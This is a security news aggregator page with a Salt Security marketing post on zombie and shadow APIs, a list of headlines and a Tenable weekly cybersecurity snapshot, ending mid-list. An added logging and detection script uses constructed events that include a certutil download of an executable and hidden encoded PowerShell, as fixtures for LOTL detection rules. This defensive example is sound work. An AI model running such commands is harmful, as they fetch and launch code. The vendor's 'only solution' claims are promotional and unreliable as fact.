Aggregator
The Hidden Dangers of Zombie and Shadow APIs—and Why Only Salt Security Can Tackle Them
In today’s hyper-connected digital landscape, APIs are the lifeblood of innovation, powering everything from customer experiences to internal operations. However, with this growing reliance on APIs comes a dark side—zombie and shadow APIs. These hidden, forgotten, or undocumented endpoints present significant security risks that traditional approaches simply can’t address. In this post, we’ll explore why these APIs are so dangerous and why Salt Security is the only solution capable of securing your entire API ecosystem.
What Are Zombie and Shadow APIs?
Before diving into the risks, it’s essential to understand what we mean by zombie and shadow APIs:
- Zombie APIs are endpoints that were once used but are now outdated, deprecated, or forgotten. These can linger in your environment long after they’re needed, exposing potential vulnerabilities.
- Shadow APIs are those created without the knowledge or approval of security teams. They often emerge when development teams build new endpoints without properly documenting or integrating them into the formal API management processes.
Both types of APIs are typically overlooked by traditional security tools, yet they are ripe targets for attackers. Unmonitored and unmanaged, these endpoints can provide easy access points for data breaches, unauthorized access, and other malicious activities.
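The practical form of this problem is an inventory gap: traffic that hits endpoints nobody documented, and documented endpoints that are retired or idle but still reachable. As an added illustration (not Salt Security's code, and not a description of how its platform works), the script below reconciles constructed access-log lines against a constructed OpenAPI-style path inventory and flags three populations: shadow endpoints (observed, undocumented), deprecated endpoints still receiving traffic, and documented endpoints with no traffic at all, which are the usual zombie candidates. The inventory, paths and log lines are all invented for the example.

```python
"""Reconcile observed API traffic against a documented inventory.

Added example, not Salt Security's code. The OpenAPI-style inventory and
the access-log lines below are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed inventory: path template -> metadata (as an OpenAPI spec would record it)
DOCUMENTED = {
    "/api/v2/users/{id}": {"deprecated": False},
    "/api/v2/orders": {"deprecated": False},
    "/api/v2/invoices": {"deprecated": False},          # documented but nobody calls it
    "/api/v1/users/{id}": {"deprecated": True},         # retired; should get no traffic
    "/api/v2/reports/{id}/export": {"deprecated": False},
}

# Constructed access-log lines: "<method> <path> <status>"
ACCESS_LOG = """\
GET /api/v2/users/42 200
GET /api/v2/orders 200
GET /api/v1/users/42 200
POST /api/internal/debug/dump 200
GET /api/v2/users/7/export 200
GET /api/v2/reports/9/export 200
"""


def template_to_regex(template):
    """Turn an OpenAPI path template into a regex; {param} matches one segment."""
    parts = []
    for seg in template.strip("/").split("/"):
        if seg.startswith("{") and seg.endswith("}"):
            parts.append(r"[^/]+")
        else:
            parts.append(re.escape(seg))
    return re.compile("^/" + "/".join(parts) + "/?$")


def match_documented(path, documented):
    """Return the inventory template that covers this concrete path, or None."""
    for template in documented:
        if template_to_regex(template).match(path):
            return template
    return None


def generalize(path):
    """Collapse numeric segments so shadow endpoints aggregate by shape, not by ID."""
    return re.sub(r"/\d+(?=/|$)", "/{id}", path)


def classify(access_log, documented):
    """Return shadow endpoints, deprecated-but-active endpoints and idle documented endpoints."""
    hits = defaultdict(int)     # documented template -> request count
    shadow = defaultdict(int)   # "METHOD /generalized/path" -> request count
    for line in access_log.splitlines():
        method, path, _status = line.split()
        path = path.split("?", 1)[0]            # ignore the query string
        template = match_documented(path, documented)
        if template is None:
            shadow[f"{method} {generalize(path)}"] += 1
        else:
            hits[template] += 1
    zombie_active = sorted(t for t, m in documented.items() if m["deprecated"] and hits[t] > 0)
    idle = sorted(t for t, m in documented.items() if not m["deprecated"] and hits[t] == 0)
    return {"shadow": dict(shadow), "zombie_active": zombie_active, "idle": idle}


if __name__ == "__main__":
    for bucket, items in classify(ACCESS_LOG, DOCUMENTED).items():
        print(bucket, items)
```

On real data the inventory would be loaded from the spec files and the traffic from gateway or proxy logs; the reconciliation logic is the same. Deprecated endpoints that still serve 200s are the ones to retire first, and undocumented endpoints under paths like `/internal/` deserve an immediate ownership check.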
The Risks of Zombie and Shadow APIs
The hidden nature of these APIs makes them particularly dangerous. Here are a few key reasons why:
- Lack of Visibility: Without complete visibility into your API inventory, it’s impossible to secure what you don’t know exists. Zombie and shadow APIs are often undocumented, making it easy for them to fall under the radar.
- Inconsistent Security Posture: These APIs might not adhere to current security standards, leaving them vulnerable to attacks like SQL injection, authentication bypasses, or data exfiltration.
- Compliance and Data Privacy Risks: Undocumented APIs can inadvertently expose sensitive data, leading to compliance violations and hefty fines under regulations like GDPR and CCPA.
- Operational Inefficiencies: Managing zombie and shadow APIs drains resources and introduces unnecessary complexity. Developers and security teams waste valuable time tracking down and mitigating issues with APIs that shouldn’t even exist.
Legacy security tools and API management platforms are ill-equipped to handle the dynamic and often chaotic nature of modern API environments. They rely on manual processes, static documentation, or simple API gateways that can’t adapt to the fluid development cycles and sprawling microservices architectures seen today. This leaves a critical gap in security that attackers are all too eager to exploit.
How Salt Security Solves the Zombie and Shadow API Problem
Salt Security’s API Protection Platform stands alone in its ability to discover, monitor, and secure every API in your environment—no matter how obscure or hidden it may be. Here’s how:
- Comprehensive API Discovery: Salt Security continuously and automatically discovers all APIs in your environment, including zombie and shadow APIs. Our platform dynamically maps your entire API landscape, providing the full visibility you need to identify risks and eliminate blind spots.
- API Posture Governance: Once an API is discovered, Salt Security lets you apply posture governance rules that bring it into line with your organization’s regulatory or industry-specific guidelines, dramatically lowering the risk profile these shadow and zombie APIs presented before they were found.
- Advanced Behavioral Analysis: Using machine learning and AI, Salt Security analyzes the behavior of every API, identifying anomalies, outdated endpoints, and undocumented activity that could indicate a zombie or shadow API. This proactive approach lets you detect issues before they become full-blown security incidents.
- Real-time Threat Detection and Response: Our platform doesn’t just discover hidden APIs—it actively protects them. Salt Security’s real-time threat detection capabilities ensure that even the most obscure APIs are monitored and secured against attacks. Deep insights into each API’s behavior allow us to quickly identify and mitigate threats specific to zombie and shadow APIs.
- Extend API Security Left: Salt Security integrates seamlessly into your development pipeline, ensuring that zombie and shadow APIs are addressed at the earliest stages of development. By embedding governance and security into the CI/CD process, we help prevent the creation of risky, undocumented APIs from the start.
While other solutions may claim to offer API protection, none provide the end-to-end capabilities needed to fully secure zombie and shadow APIs. Salt Security offers the most comprehensive AI-infused platform for API security, combining deep discovery, continuous monitoring, governance, and proactive threat detection. Our solution not only finds hidden APIs—it safeguards them, ensuring your organization’s API landscape remains resilient, compliant, and secure.
Conclusion
Zombie and shadow APIs represent a hidden yet significant threat to your organization’s security posture. With traditional tools falling short, it’s time to rethink your API security strategy. Salt Security’s unique capabilities make it the only solution capable of addressing the full spectrum of API threats—including those you can’t see.
By choosing Salt Security, you can rest assured that your APIs—documented or not—are fully protected, enabling your business to innovate without compromise.
If you want to learn more about Salt and how we can help you on your API Security journey through discovery, posture management, and run-time threat protection, please contact us, schedule a demo, or check out our website.
The post The Hidden Dangers of Zombie and Shadow APIs—and Why Only Salt Security Can Tackle Them appeared first on Security Boulevard.
Defenders Get A MoonPeak At North Korea's Malware Backbone
Weekly Roundup of Major Global Cybersecurity Incidents (Issue 35)
Achieving Arbitrary User Login by Discovering Hidden Parameter Values
Group Policies and Malicious Scripts: Qilin Finds a New Loophole for Data Theft
Introducing Azure Boards Integration in Strobes
We’re excited to announce the integration of Azure Boards into Strobes, enhancing your project management capabilities and streamlining your vulnerability tracking processes. Azure Boards Overview: Azure Boards is a project...
The post Introducing Azure Boards Integration in Strobes appeared first on Strobes Security.
Local Networks Go Global When Domain Names Collide
High Profile AI Fraud: DeepFake, Identity Imitation
OnDemand | The Business Value of Prisma Cloud for Google Cloud
C-Suite Involvement in Cybersecurity Is Little More Than Lip Service
CVE-2024-28987: Critical Threat in SolarWinds WHD Requires Urgent Action
Russian laundering millions for Lazarus hackers arrested in Argentina
Georgia Tech Sued Over Cybersecurity Violations
NTLM Credential Theft in Python Windows Applications
This post walks through the vulnerabilities we disclosed affecting Gradio, and our work with Hugging Face to harden the Spaces platform after a recently reported potential breach.
The post NTLM Credential Theft in Python Windows Applications appeared first on Horizon3.ai.
Zr.Ms. Karel Doorman Returns From Its Mission in the Red Sea
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 34
Authorities nab crypto and extortion criminals, cloud hacktool identified in spam SMS attacks, and DPRK actors exploit Windows zero-day.
The post The Good, the Bad and the Ugly in Cybersecurity – Week 34 appeared first on SentinelOne.
Cybersecurity Snapshot: Guide Unpacks Event-Logging Best Practices, as FAA Proposes Stronger Cyber Rules for Airplanes
Looking to sharpen your team’s event logging and threat detection? A new guide offers plenty of best practices. Plus, the FAA wants airplanes to be more resilient to cyberattacks. Meanwhile, check out the critical vulnerabilities Tenable discovered in two Microsoft AI products. And get the latest on ransomware trends, vulnerability management practices and election security!
Dive into six things that are top of mind for the week ending August 23.
1 - Guide outlines logging and threat detection best practices
As attackers double down on the use of stealthy, hard-to-detect “living off the land” (LOTL) techniques, cybersecurity teams should improve how they log events and detect threats. That’s the call government agencies from multiple countries made in a joint guide published this week and titled “Best Practices for Event Logging and Threat Detection.”
“Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility,” reads the guide, which was developed by the Australian Cyber Security Centre (ACSC).
The guide, whose intended audience includes senior IT and operational technology (OT) leaders and operators, network administrators and critical infrastructure providers, groups its best practices under four categories:
- Enterprise-approved event logging policy, which includes event-log quality and the consistency of content, formats and timestamps
- Centralized log collection and correlation, which focuses on logging priorities for enterprise networks, OT systems, mobile devices and cloud environments
- Secure storage and event-log integrity, which touches on protecting logs from unauthorized access, modification and deletion
- Detection strategy for relevant threats, which deals with LOTL techniques, such as attackers’ use of legitimate tools and capabilities in the breached environment
The guide’s recommendations can help “detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts,” reads a statement from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which collaborated with the ACSC, along with cyber agencies from seven other countries.
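Three of the four categories above can be shown concretely: consistent timestamps, tamper-evident storage and a detection rule for LOTL tool use. The script below is an added illustration written for this summary, not tooling from the guide or from any of the agencies behind it. It normalizes constructed process-creation events to UTC, links them in a SHA-256 hash chain so that an edited or deleted record fails verification, and runs two simple LOTL rules (certutil used as a downloader, PowerShell with an encoded command) over the result. The event records, hostnames and command lines are all constructed.

```python
"""Event normalization, hash-chained log integrity and LOTL detection.

Added example for illustration; not the guide's own tooling. All events
below are constructed, including hosts, users and command lines.
"""
import hashlib
import json
from datetime import datetime, timezone

GENESIS = "0" * 64  # previous-hash value for the first record in the chain

# Constructed process-creation events from two hosts with inconsistent timestamp formats
RAW_EVENTS = [
    {"ts": "2024-08-21T14:03:11+10:00", "host": "ws-17", "user": "jdoe",
     "proc": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe"},
    {"ts": "2024-08-21T04:03:12Z", "host": "ws-17", "user": "jdoe",
     "proc": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2024-08-21T04:05:00Z", "host": "srv-db", "user": "svc_backup",
     "proc": "cmd.exe", "cmdline": "cmd.exe /c dir C:\\"},
]


def normalize(event):
    """Consistent content and timestamps: every record gets an ISO 8601 UTC timestamp."""
    ts = datetime.fromisoformat(event["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    return {**event, "ts": ts.strftime("%Y-%m-%dT%H:%M:%SZ")}


def _record_hash(prev_hash, event):
    body = json.dumps(event, sort_keys=True)  # canonical encoding, so hashing is repeatable
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def chain(events):
    """Secure storage: each record commits to the previous record's hash."""
    prev = GENESIS
    records = []
    for e in events:
        digest = _record_hash(prev, e)
        records.append({"prev": prev, "event": dict(e), "hash": digest})
        prev = digest
    return records


def verify(records):
    """Return the index of the first broken record, or None if the chain is intact."""
    prev = GENESIS
    for i, r in enumerate(records):
        if r["prev"] != prev or _record_hash(prev, r["event"]) != r["hash"]:
            return i
        prev = r["hash"]
    return None


def _tokens(event):
    return [t.lower() for t in event["cmdline"].split()]


# Detection strategy: legitimate tools used in ways that rarely appear in normal operations
LOTL_RULES = [
    ("certutil download",
     lambda e: e["proc"].lower() == "certutil.exe" and "-urlcache" in _tokens(e)),
    ("encoded powershell",
     lambda e: e["proc"].lower() == "powershell.exe"
     and any(t in ("-e", "-enc", "-encodedcommand") for t in _tokens(e))),
]


def detect(events):
    """Return (timestamp, host, rule name) for every event matching a LOTL rule."""
    return [(e["ts"], e["host"], name) for e in events for name, rule in LOTL_RULES if rule(e)]


if __name__ == "__main__":
    events = [normalize(e) for e in RAW_EVENTS]
    records = chain(events)
    print("chain intact:", verify(records) is None)
    for hit in detect(events):
        print("alert:", hit)
```

The chain only proves integrity if the most recent hash is periodically anchored somewhere the attacker cannot reach (a separate collector, a signed checkpoint); on its own it shows that modification or deletion happened, not who did it. The two rules are deliberately narrow; real LOTL detection needs baselines of what administrators normally run on each host class, which is why the guide puts centralized collection ahead of detection.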
To get more details, check out:
- CISA’s announcement
- The full 17-page guide “Best Practices for Event Logging and Threat Detection”
For more information about event logging and threat detection:
- “Security log management and logging best practices” (TechTarget)
- “Logging Cheat Sheet” (OWASP)
- “Network security logging and monitoring” (Canadian Centre for Cyber Security)
- “Introduction to logging for security purposes” (U.K. NCSC)
To beef up the aviation sector’s cyber defenses, the U.S. government this week proposed new cybersecurity rules for airplanes, engines and propellers as they become increasingly connected to computer networks and services.
In a proposed rulemaking notice, the U.S. Federal Aviation Administration (FAA) said some of its regulations are “inadequate and inappropriate to address the cybersecurity vulnerabilities caused by increased interconnectivity.”
Current airplane designs expose them to cyber risk through maintenance laptops, airport and airline networks, the internet, wireless sensors and their networks, USB devices, cellular and satellite systems and communications, and other connections.
The proposed new and revised rules seek to protect airplanes, engines and propellers from “intentional unauthorized electronic interactions” (IUEI). To that end, the FAA wants to require product designers and manufacturers to identify and assess IUEI risks and mitigate them.
In practice, they would need to conduct a security risk analysis that identifies cyberthreats, assesses their severity, determines the likelihood of exploitation and mitigates the resulting security issues.
The proposed rules are now open for public comment.
To get more details, check out the 36-page notice of proposed rulemaking titled “Equipment, Systems, and Network Information Security Protection.”
For more information about aviation cybersecurity:
- “TSA, FAA Requirements Emphasize Cybersecurity for Airport and Aircraft Operators and Airport Terminal Projects” (Tenable)
- “Aviation Cybersecurity: Risks and Mitigations” (National Business Aviation Association)
- “Why aviation needs to prioritise cybersecurity” (Airport World)
- “Protecting The Aviation Sector From Cyberattacks” (Tenable)
Tenable Research recently discovered critical vulnerabilities in Microsoft’s Azure Health Bot Service and Copilot Studio.
In the case of Azure Health Bot Service, a cloud platform for deploying AI-powered virtual health assistants, the critical vulnerabilities allowed researchers access to cross-tenant resources within this service.
Meanwhile, a server-side request forgery (SSRF) vulnerability in Copilot Studio allowed researchers access to potentially sensitive information regarding service internals with potential cross-tenant impact. With Copilot Studio, you can build custom Copilot conversational applications for performing large language model (LLM) and generative AI tasks.
To get all the details, read these Tenable blogs:
- “SSRFing the Web with the Help of Copilot Studio”
- “Compromising Microsoft's AI Healthcare Chatbot Service”
You can also find media coverage of the two discoveries here:
Copilot Studio
- “Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data” (Dark Reading)
- “Microsoft Copilot Studio Vulnerability Led to Information Disclosure” (SecurityWeek)
- “Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data” (The Hacker News)
Azure Health Bot Service
- “Microsoft's AI Health Bot required patching for privilege vulnerability” (Healthcare IT News)
- “Fix for Azure Health Bot vulnerabilities prevents exploitation” (TechTarget)
- “Microsoft Azure AI Health Bot Infected With Critical Vulnerabilities” (Dark Reading)
During our recent webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable,” we polled attendees on their biggest VM challenge and on patching prioritization. Check out what they said!
(Poll results chart not reproduced: 231 webinar attendees polled by Tenable, August 2024)
(Poll results chart not reproduced: 234 webinar attendees polled by Tenable, August 2024)
Want to learn how to improve key vulnerability management practices, including remediation prioritization? Watch this on-demand webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable.”
5 - Report: Ransomware attacks jumped in July, as attackers turn to infostealer malware
Ransomware attacks spiked 20% globally in July, compared with June, as the RansomHub gang emerged as the most active group.
However, ransomware attacks were down compared with July 2023, and “remain much lower” than the activity observed between February and May of this year.
That’s according to the “Monthly Threat Pulse” report for July 2024, published this week by NCC Group’s Global Threat Intelligence team.
“Whether this increase reflects the start of an upward trend remains to be seen,” the report reads.
(Chart not reproduced: Global Ransomware Attacks by Month 2023 - 2024. Source: “Monthly Threat Pulse” report from NCC Group, August 2024)
The industrials sector was the hardest hit, receiving about a third of all attacks, a clear sign of ransomware groups’ strong interest in breaching critical-infrastructure organizations, the report says.
Ransomware groups pounced on CVE-2024-37085, an authentication-bypass vulnerability in the VMware ESXi hypervisor product, a reminder that organizations need to continue to prioritize patching high-risk bugs.
While vulnerability exploitation remains a popular tactic for ransomware attackers, they’re also increasing their use of information stealer malware, which offers them a “far easier, faster and often cheaper” way to access a network via the use of stolen credentials, the report reads.
“The rise in sophisticated techniques, such as the use of information stealer malware in their pre-attack phase, highlights that cybercriminals are not standing still. As these threats evolve, so must our defences,” Ian Usher, Deputy Head of Threat Intelligence at NCC Group, said in a statement.
To get more details, check out:
- The report’s announcement
- The “Monthly Threat Pulse Review of July 2024”
For more information about ransomware trends:
- “Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)
- “Ransomware on track for record profits, even as fewer victims pay” (SC Magazine)
- “Ransom recovery costs reach $2.73 million” (Help Net Security)
- “Ransomware report finds 43% of data unrecoverable after attack” (SC Magazine)
Although ransomware gangs may try to disrupt the U.S. general election, their attacks won’t compromise the voting and counting processes, according to CISA and the FBI. At most, ransomware attacks would cause isolated delays and be minimally disruptive.
“The public should be aware that ransomware is extremely unlikely to affect the integrity of voting systems or the electoral process,” FBI Cyber Division Deputy Assistant Director Cynthia Kaiser said in a statement.
The reason: U.S. election officials have put in place what CISA and the FBI call a “multi-layer approach to security” with a variety of technical, physical and procedural safeguards.
“In the event of a ransomware event affecting their offices, election officials have plans and redundancies in place to allow voting operations to continue so that all eligible voters are able to cast their ballot securely,” reads a joint public-service announcement from CISA and the FBI.
To get more details, check out: